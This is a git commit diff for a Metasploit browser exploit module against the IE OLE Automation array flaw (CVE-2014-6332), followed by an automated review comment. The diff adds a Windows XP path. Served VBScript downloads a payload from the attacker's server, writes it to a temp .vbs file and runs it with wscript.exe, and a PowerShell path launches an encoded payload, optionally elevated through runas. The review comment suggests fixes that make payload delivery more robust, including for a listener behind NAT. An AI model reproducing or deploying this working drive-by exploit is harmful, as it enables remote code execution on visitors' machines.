Update MS14-064 for Windows XP

bug/bundler_fix
sinn3r 2015-02-23 23:08:13 -06:00
parent 1b7e819106
commit 578a545b22
1 changed files with 105 additions and 22 deletions


@ -11,6 +11,7 @@ class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE
include Msf::Exploit::Powershell
def initialize(info={})
@ -18,10 +19,13 @@ class Metasploit4 < Msf::Exploit::Remote
'Name' => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
'Description' => %q{
This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.
The vulnerability affects Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
For this module to be successful, powershell is required on the target machine. On
Internet Explorer versions using Protected Mode, the user has to manually allow
powershell.exe to execute in order to be compromised.
The vulnerability affects Internet Explorer 3.0 until version 11 within Windows 95 up to
Windows 10, and there is no patch for Windows XP or older.
Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other
Windows systems, the exploit will try using Powershell instead. If Protected Mode is
enabled, the user has to manually allow powershell.exe to execute in order to be
compromised.
},
'License' => MSF_LICENSE,
'Author' =>
@ -32,6 +36,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Wesley Neelen', # security[at]forsec.nl
'GradiusX <francescomifsud[at]gmail.com>',
'b33f', # @FuzzySec
'sinn3r'
],
'References' =>
[
@ -46,14 +51,24 @@ class Metasploit4 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[
'Windows XP',
{
'os_name' => OperatingSystems::Match::WINDOWS_XP
}
],
[
'Other Windows x86',
{
'os_name' => OperatingSystems::Match::WINDOWS,
}
]
],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:ua_name => HttpClients::IE,
:os_name => /win/i,
:arch => 'x86',
:arch => ARCH_X86,
:ua_ver => lambda { |ver| ver.to_i.between?(4, 10) }
},
'DefaultOptions' =>
@ -260,20 +275,18 @@ end function
end
def get_html()
def vbs_vector(prep)
vbs_name = "#{Rex::Text.rand_text_alpha(rand(16)+4)}.vbs"
gif_name = "#{Rex::Text.rand_text_alpha(rand(5)+3)}.gif"
if datastore['TRYUAC']
tryuac = 'runas'
else
tryuac = 'open'
end
payload_src = (datastore['SSL'] ? 'https' : 'http')
payload_src << '://'
payload_src << (datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'])
payload_src << ":#{datastore['SRVPORT']}#{get_module_resource}/#{gif_name}"
payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
payl.slice! "powershell.exe "
prep = vbs_prepare()
html = %Q|
<!doctype html>
# I tried to use ADODB.Stream to save my downloaded executable, but I was hitting an issue
# with it, so I ended up with Scripting.FileSystemObject. Not so bad I guess.
%Q|<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
@ -282,8 +295,19 @@ end function
function runaaaa()
On Error Resume Next
set xmlhttp = CreateObject("Microsoft.XMLHTTP")
xmlhttp.open "GET", "#{payload_src}", False
xmlhttp.send
Set objFSO=CreateObject("Scripting.FileSystemObject")
folder = objFSO.GetSpecialFolder(2)
scriptName = folder + "\\#{vbs_name}"
Set objFile = objFSO.CreateTextFile(scriptName,True)
objFile.Write xmlhttp.responseText
objFile.Close
set shell=createobject("Shell.Application")
shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0
shell.ShellExecute "wscript.exe", scriptName, "", "open", 0
end function
</script>
@ -293,12 +317,71 @@ end function
</body>
</html>
|
end
def powershell_vector(prep)
if datastore['TRYUAC']
tryuac = 'runas'
else
tryuac = 'open'
end
# Powershell was the first technique demonstrated publicly.
# On some Windows setups such as Windows 7 + IE 8, this works quite well.
# But you will get a prompt for IE9 or newer.
payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
payl.slice! "powershell.exe "
%Q|<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<body>
<script language="VBScript">
function runaaaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0
end function
</script>
<script language="VBScript">
#{prep}
</script>
</body>
</html>
|
end
def get_html
prep = vbs_prepare()
case get_target.name
when OperatingSystems::Match::WINDOWS_XP
return vbs_vector(prep)
else
return powershell_vector(prep)
end
end
def on_request_exploit(cli, request, target_info)
print_status("Requesting: #{request.uri}")
send_exploit_html(cli, get_html())
case request.uri
when /\.gif/
if get_target.name =~ OperatingSystems::Match::WINDOWS_XP
p = regenerate_payload(cli)
data = generate_payload_exe({:code => p.encoded})
# The default template uses \n, and wscript.exe isn't very happy about that.
# It should be \r\n .
vbs = Msf::Util::EXE.to_exe_vbs(data).gsub(/\x0a/, "\r\n")
send_response(cli, vbs)
else
# The VBS technique is only for Windows XP. So if a non-XP system is requesting it,
# something is not right.
send_not_found(cli)
end
else
send_exploit_html(cli, get_html)
end
end
end
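Review bot: The `.gif` branch in on_request_exploit converts line endings with `gsub(/\x0a/, "\r\n")`, which rewrites every LF regardless of what precedes it, so any CRLF already present in the generated VBS becomes `\r\r\n`; a normalizing form such as `vbs = Msf::Util::EXE.to_exe_vbs(data).gsub(/\r?\n/, "\r\n")` keeps the stated intent (wscript.exe wants CRLF) without that risk. In vbs_vector, `tryuac` and `payl = cmd_psh_payload(...)` / `payl.slice! "powershell.exe "` look like leftovers from the old get_html: the new XP path launches `wscript.exe` with the downloaded script, and if the `shell.ShellExecute "powershell.exe", ...` line is the removed one, both values are computed on every request (including a full PowerShell payload build) and never interpolated into the page, so they should be dropped; vbs_vector spans the hunks from `@ -260,20 +275,18` through the closing `</html>` block. Separately, `payload_src` is built directly from `SRVHOST`/`SRVPORT`, so if the HTTP server mixin's URIHOST/URIPORT overrides are expected to apply to this module, the XP vector's download URL bypasses them, which would break the VBS fetch when the listener sits behind NAT; worth confirming against BrowserExploitServer's URL helpers. Finally, get_html matches the target with `case`/`when` against `OperatingSystems::Match::WINDOWS_XP` while on_request_exploit uses `=~` for the same check; both work for a Regexp constant, but picking one form for the two sites would make the XP gating easier to audit.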